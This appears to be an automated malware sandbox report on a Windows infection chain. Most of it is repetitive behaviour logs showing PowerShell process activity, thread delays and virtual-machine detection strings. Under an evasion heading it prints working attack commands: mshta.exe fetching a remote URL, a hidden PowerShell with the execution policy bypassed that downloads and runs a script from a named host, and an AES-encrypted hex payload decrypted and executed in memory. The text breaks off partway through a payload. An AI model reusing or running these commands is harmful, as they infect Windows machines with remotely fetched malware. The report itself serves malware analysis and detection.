Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2125Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1317Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5020Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 700Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5673Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4057Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7520Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7716Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7856Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7800Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7844Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7984Thread sleep time: -14757395258967632s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: powershell.exe, 00000004.00000002.1770657838.00000189790C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000004.00000002.1769365510.0000018978F1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSIdRom&Ven_NECVMWar&Prod_VMware_
Source: mshta.exe, 00000002.00000002.1806902173.000001C9A2F68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}GE
Source: mshta.exe, 00000002.00000003.1778778827.000001C19C8B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}
Source: mshta.exe, 00000002.00000003.1783060357.000001C19C82B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1800072120.000001C19C867000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1800305341.000001C19C8B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1798070567.000001C19C8B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1794253380.000001C19C867000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1800072120.000001C19C82C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1783060357.000001C19C867000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1778778827.000001C19C8B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1794253380.000001C19C82C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2912318880.000001EB77455000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2912197242.000001EB77443000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: powershell.exe, 00000004.00000002.1770657838.00000189790C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: mshta.exe, 00000002.00000003.1778209554.000001C99EB24000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\3
Source: svchost.exe, 00000003.00000002.2909480503.000001EB71E2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
Source: powershell.exe, 00000006.00000002.1783092425.00000000079E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Bypasses PowerShell execution policy
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command & {'2LT'|ForEach-Object {SI Variable:2LT ([PowerShell]::Create()); [Void](Get-Item Variable:\2LT).Value.AddScript((([System.Net.WebClient]::New().((([System.Net.WebClient]::New()|Get-Member)|Where-Object{(Get-Variable _ -Value).Name -ilike '*wn*d*g'}).Name)('https://pawpaws1.readit-carfanatics.com/madonna.vstx')))); (Get-Item Variable:\2LT).Value.Invoke(); (Get-Item Variable:\2LT).Value.Dispose()}}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://pawpaws.readit-carfanatics.com/madonna.mp4Jump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function qtyVd($UNYZ){return -split ($UNYZ -replace '..', '0x$& ')};$ZKIHj = qtyVd('943C2C5C46A72B5C4C8C5C1A51E4FDD0974703BCE4EDF56B369378DFB2ECC854E259560AB569239046F77EA06A763337BD3340FF80B07C3CFCE33778E61B44845B5324775EE6ECAD2D2F37DD4F8DC9D93A8ABA7267AA5EA340079FA2334C6403714460816209B0D0411244284F7B8814FD62C23E419A8D047CB9595A51FEA7A3BCA7328CC8FCAF14C3F8165E90E2486DFAD60C27534F2C51C86D7F420CBBA4ABB44CACB3574A60609ED4B1F8BBC087D26FFE66EEB68F5686820C155B78783E6E11CF5815FCD1E2F8CA8C49791C0C4DF291EA66A7712921D9C59DB6E39D4F98ED2DC1A8E7A9946079CA7BF16CE0B32D041BED47781FEB352BDF1FB6018763D773644268B71F2526F6A617A9272A9ACDB0172FF20C3D1547782E3DBE0EDEC2C049AEA1DCE8744256C6E8717D86E602BF21D022B7E481612FD0E5AD43DEF8AEFF4BB1BB463D861888792AC5CFDAC45C5AAD05BEE91DABCC7A8CE6DC0862F3E928BE382F093C9D84D38A85151EEABB858C33520B5AABA90DFF68EE69A74D113C6C05BC871865DA879842D0B54C1DB7F4958097D12CECC5F9E39C9F6EF9ADF065DDA2643775FF589BDDA148E4527B97DE7BA451AC1EE997B73B0A1625177692622E4719148456AC24DEEA746D100F63E2E62646F66B245D3EED88607AB4D8A6022FA2F645BBFA59344E4471CB907FA8E491AA033889DB9D942E3F5420FF522C4C2C6217479BAC41430765CC37214D382A23920123068E397CA5AE645C1D0119DB511F8B852EA48834469651D0EC476969F2449303E7019452064057CE45DC4E16896B015B29CB64430183AF5618B121490DEE43084DC3253BC82E49716867CB584156D7865E1FA9DA392090109DF6E9A6CEFCAB60BE063896FE271D5F7145798747455EBE31B24E9BAE3DDE94E125C3AAB0F1CC7DA5D7D2C49F75D3D71BE3450EDFB23086A4D618521B1EE6EA4F7759E9CFC131005524C9B65D1D3D9FCB4F3E8A222D8020E0829864F6709CEA97810C2185CB147F13C7495B150A44FE94EC3E805FBE21BAB82B15870CAE560AAE4D4D533E433ABF4E5A563B39F36B23B63195F3779B0F8E07AE51936D7659CF47354C6662908568295088267D164DBF8CD609767B8170DEFEE21B10CE5C7244C519247C7C2F9CE8D7FA4027320E443B37F498F4BCDE2E63A97AC0167DCBD9DF73193FA93B3A82859FC1C7C6A740DD7140682426D7269E3DDEB5AB9467EC828C2C24E5D9149A12D98DFF32D05203D7536888907C29CA12DFCFB29B179E5F80DF3C545318D33794FAE90BEC7C573D81530A72C3E1664C1FCD78FFE0CC509A78F2E435BEE0A9EE5E4C0F5F6825B6883A784655B387AC0A63D3779D94D06E0C3BFC63D493D83B351266304E3C6A7FE938DB9F5FFD576369C82CA0050C55C2E8E82286D9AC048EE0F6E20CF515B8D1A1268959B2D3E695204352487CF3533397B42917060A182262AA9F2EA0B93E6742C4A2C669E95CD728');$MIDMd=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((qtyVd('794A5742476F737A6A656E545246734B')),[byte[]]::new(16)).TransformFinalBlock($ZKIHj,0,$ZKIHj.Length)); & $MIDMd.Substring(0,3) $MIDMd.Substring(129)Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command & {'2LT'|ForEach-Object {SI Variable:2LT ([PowerShell]::Create()); [Void](Get-Item Variable:\2LT).Value.AddScript((([System.Net.WebClient]::New().((([System.Net.WebClient]::New()|Get-Member)|Where-Object{(Get-Variable _ -Value).Name -ilike '*wn*d*g'}).Name)('https://pawpaws1.readit-carfanatics.com/madonna.vstx')))); (Get-Item Variable:\2LT).Value.Invoke(); (Get-Item Variable:\2LT).Value.Dispose()}} Jump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function qtyvd($unyz){return -split ($unyz -replace '..', '0x$& ')};$zkihj = qtyvd('943c2c5c46a72b5c4c8c5c1a51e4fdd0974703bce4edf56b369378dfb2ecc854e259560ab569239046f77ea06a763337bd3340ff80b07c3cfce33778e61b44845b5324775ee6ecad2d2f37dd4f8dc9d93a8aba7267aa5ea340079fa2334c6403714460816209b0d0411244284f7b8814fd62c23e419a8d047cb9595a51fea7a3bca7328cc8fcaf14c3f8165e90e2486dfad60c27534f2c51c86d7f420cbba4abb44cacb3574a60609ed4b1f8bbc087d26ffe66eeb68f5686820c155b78783e6e11cf5815fcd1e2f8ca8c49791c0c4df291ea66a7712921d9c59db6e39d4f98ed2dc1a8e7a9946079ca7bf16ce0b32d041bed47781feb352bdf1fb6018763d773644268b71f2526f6a617a9272a9acdb0172ff20c3d1547782e3dbe0edec2c049aea1dce8744256c6e8717d86e602bf21d022b7e481612fd0e5ad43def8aeff4bb1bb463d861888792ac5cfdac45c5aad05bee91dabcc7a8ce6dc0862f3e928be382f093c9d84d38a85151eeabb858c33520b5aaba90dff68ee69a74d113c6c05bc871865da879842d0b54c1db7f4958097d12cecc5f9e39c9f6ef9adf065dda2643775ff589bdda148e4527b97de7ba451ac1ee997b73b0a1625177692622e4719148456ac24deea746d100f63e2e62646f66b245d3eed88607ab4d8a6022fa2f645bbfa59344e4471cb907fa8e491aa033889db9d942e3f5420ff522c4c2c6217479bac41430765cc37214d382a23920123068e397ca5ae645c1d0119db511f8b852ea48834469651d0ec476969f2449303e7019452064057ce45dc4e16896b015b29cb64430183af5618b121490dee43084dc3253bc82e49716867cb584156d7865e1fa9da392090109df6e9a6cefcab60be063896fe271d5f7145798747455ebe31b24e9bae3dde94e125c3aab0f1cc7da5d7d2c49f75d3d71be3450edfb23086a4d618521b1ee6ea4f7759e9cfc131005524c9b65d1d3d9fcb4f3e8a222d8020e0829864f6709cea97810c2185cb147f13c7495b150a44fe94ec3e805fbe21bab82b15870cae560aae4d4d533e433abf4e5a563b39f36b23b63195f3779b0f8e07ae51936d7659cf47354c6662908568295088267d164dbf8cd609767b8170defee21b10ce5c7244c519247c7c2f9ce8d7fa4027320e443b37f498f4bcde2e63a97ac0167dcbd9df73193fa93b3a82859fc1c7c6a740dd7140682426d7269e3ddeb5ab9467ec828c2c24e5d9149a12d98dff32d05203d7536888907c29ca12dfcfb29b179e5f80df3c545318d33794fae90bec7c573d81530a72c3e1664c1fcd78ffe0cc509a78f2e435bee0a9ee5e4c0f5f6825b6883a784655b387ac0a63d3779d94d06e0c3bfc63d493d83b351266304e3c6a7fe938db9f5ffd576369c82ca0050c55c2e8e82286d9ac048ee0f6e20cf515b8d1a1268959b2d3e695204352487cf3533397b42917060a182262aa9f2ea0b93e6742c4a2c669e95cd728');$midmd=-join [char[]](([security.cryptography.aes]::create()).createdecryptor((qtyvd('794a5742476f737a6a656e545246734b')),[byte[]]::new(16)).transformfinalblock($zkihj,0,$zkihj.length)); & $midmd.substring(0,3) $midmd.substring(129)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -w hidden -ep bypass -nop -command & {'2lt'|foreach-object {si variable:2lt ([powershell]::create()); [void](get-item variable:\2lt).value.addscript((([system.net.webclient]::new().((([system.net.webclient]::new()|get-member)|where-object{(get-variable _ -value).name -ilike '*wn*d*g'}).name)('https://pawpaws1.readit-carfanatics.com/madonna.vstx')))); (get-item variable:\2lt).value.invoke(); (get-item variable:\2lt).value.dispose()}}
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function qtyvd($unyz){return -split ($unyz -replace '..', '0x$& ')};$zkihj = qtyvd('943c2c5c46a72b5c4c8c5c1a51e4fdd0974703bce4edf56b369378dfb2ecc854e259560ab569239046f77ea06a763337bd3340ff80b07c3cfce33778e61b44845b5324775ee6ecad2d2f37dd4f8dc9d93a8aba7267aa5ea340079fa2334c6403714460816209b0d0411244284f7b8814fd62c23e419a8d047cb9595a51fea7a3bca7328cc8fcaf14c3f8165e90e2486dfad60c27534f2c51c86d7f420cbba4abb44cacb3574a60609ed4b1f8bbc087d26ffe66eeb68f5686820c155b78783e6e11cf5815fcd1e2f8ca8c49791c0c4df291ea66a7712921d9c59db6e39d4f98ed2dc1a8e7a9946079ca7bf16ce0b32d041bed47781feb352bdf1fb6018763d773644268b71f2526f6a617a9272a9acdb0172ff20c3d1547782e3dbe0edec2c049aea1dce8744256c6e8717d86e602bf21d022b7e481612fd0e5ad43def8aeff4bb1bb463d861888792ac5cfdac45c5aad05bee91dabcc7a8ce6dc0862f3e928be382f093c9d84d38a85151eeabb858c33520b5aaba90dff68ee69a74d113c6c05bc871865da879842d0b54c1db7f4958097d12cecc5f9e39c9f6ef9adf065dda2643775ff589bdda148e4527b97de7ba451ac1ee997b73b0a1625177692622e4719148456ac24deea746d100f63e2e62646f66b245d3eed88607ab4d8a6022fa2f645bbfa59344e4471cb907fa8e491aa033889db9d942e3f5420ff522c4c2c6217479bac41430765cc37214d382a23920123068e397ca5ae645c1d0119db511f8b852ea48834469651d0ec476969f2449303e7019452064057ce45dc4e16896b01